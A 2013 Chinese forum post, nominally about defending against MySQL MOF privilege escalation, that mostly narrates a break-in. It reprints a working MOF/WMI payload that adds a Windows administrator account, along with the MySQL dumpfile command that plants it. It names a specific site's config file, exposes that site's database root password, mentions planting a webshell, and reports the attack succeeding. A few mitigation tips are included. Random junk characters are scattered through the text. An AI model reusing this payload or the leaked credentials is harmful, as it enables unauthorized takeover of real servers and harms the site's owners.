Mysql mof扩展漏洞防范方法7 F+ |8 F- e; T0 D5 e# l! L# T
/ |6 x9 ~& R y网上公开的一些利用代码:' [9 k O2 I2 Q3 T, O6 z
% |: v0 |2 G$ [: A, G
#pragma namespace(“\\\\.\\root\\subscription”)* ~$ ?2 ~+ h1 K$ z7 h
4 W5 b) j2 h5 V. V6 Hinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
2 r* \/ F' [' j4 A+ y! F q g: d, u' m& r; [8 Y2 m) r
( J9 h/ y. p! F; t% @9 w
0 Y( p2 m* b& e) J5 d, @
& ^! g! c E9 M
, f$ i9 V4 ` ?% v* I/ p
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
3 z8 j Z6 L" G6 M0 @$ d! q: n从上面代码来看得出解决办法:7 c/ f8 K! j0 N% C3 h( x3 \3 p
9 h% r$ \4 ^5 q' |1 H4 f
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数6 y( _' V k- ?
6 S& F8 O* k7 Z w$ z) P: z2、禁止使用”WScript.Shel”组件
. H+ a7 z/ P1 y
; f1 `- E, }/ b' K4 v& E+ S3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER2 H y0 D m) e* ^- a+ ^# B
5 F5 m8 b( w. u; p6 h# h4 r/ \当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下3 U; c# G9 j$ f" u
+ ?% a0 s/ R2 A: y# O7 K9 y/ d事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
# M2 k; u% J' Y# g. i% J4 T. T, l, {! w6 D
7 B* I6 p+ }" r2 g; e但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容- u7 n& g0 @4 z' ~; v
( m/ @, ?5 w( Y+ _
看懂了后就开始练手吧
% Z9 [. M/ w1 P4 k) N
( y. O! C* s4 W O9 Ihttp://www.webbmw.com/config/config_ucenter.php 一句话 a
4 c8 O+ I; R% x4 h
+ x5 V: B* I8 s) B, y8 [$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
: G- A2 ^/ z- a! G, ?1 C+ t2 |) f( i8 N( \7 c
于是直接用菜刀开搞
* Y$ @3 C) l F* F" B9 k! U6 b, p) K# j! o& B% u7 z# a- u3 c
上马先
; @2 f6 V3 J) c9 t# r3 @- x
! h5 D6 S: ~& ~2 O0 Z/ y4 K/ \既然有了那些账号 之类的 于是我们就执行吧…….+ z% J: _$ e1 w1 B; L
" V) V4 a* E' n* t; m3 J9 v$ r0 U
小小的说下, J3 O! I7 y! i- O
- H' |1 O7 i& Y/ d4 C+ Z
在这里第1次执行未成功 原因未知
& ~8 F8 l, N; F* Z) M3 y* B) r: T, s' g( O! P
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
" Z. O2 ]) @+ l5 ]" _6 W
3 t, F/ y& Z. @( d2 R7 I#pragma namespace(“\\\\.\\root\\subscription”)
+ M V" _, I) s6 `5 K# g
3 S T H) C; R6 q2 w" u) Pinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };& Q- H) U3 _: J& h6 e: h, l
# C% n* R U) Q* C5 ]
我是将文件放到C:\WINDOWS\temp\1.mof
# z3 w- }5 r6 u- _& r6 h3 a6 ^3 w: L" w' Z H4 @ O
所以我们就改下执行的代码
. C& i& p3 m0 @2 B: t' Z0 I0 k6 Q D- o
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;1 t8 f7 N! ?+ c/ W7 D3 u
# Z3 p9 s4 b2 }1 m3 D5 V7 X: A- D z, p7 o
) I4 j% F# d2 W! C2 l8 p2 @但是 你会发现账号还是没有躺在那里。。5 ?! K% |% m) M" f: `$ w1 G0 `
$ ?" ?7 c$ N( H' E( q3 ?, ]9 N于是我就感觉蛋疼/ a R8 U" M1 t$ |+ `
9 d- E1 M) q- m+ y! B# I就去一个一个去执行 但是执行到第2个 mysql时就成功了………$ \5 N& g, d+ W2 M6 K
0 H' N! l2 p5 C* U3 Z/ h
- {/ ^) Y9 C* R! r
$ C" X$ ^ e; j1 L, c
但是其他库均不成功…
9 `$ N! S U$ R4 Z$ A" U" }
0 w ]" C3 j4 {: m我就很费解呀 到底为什么不成功求大牛解答…" E, E' [4 n5 U7 h$ w A, s/ m
2 f* h* A9 ^5 i3 N- h. r' ?* r8 ]% N8 O/ o
& }5 I- N, P; x# S! i
|
发表于 2013-1-4 19:49:49
收藏
支持
反对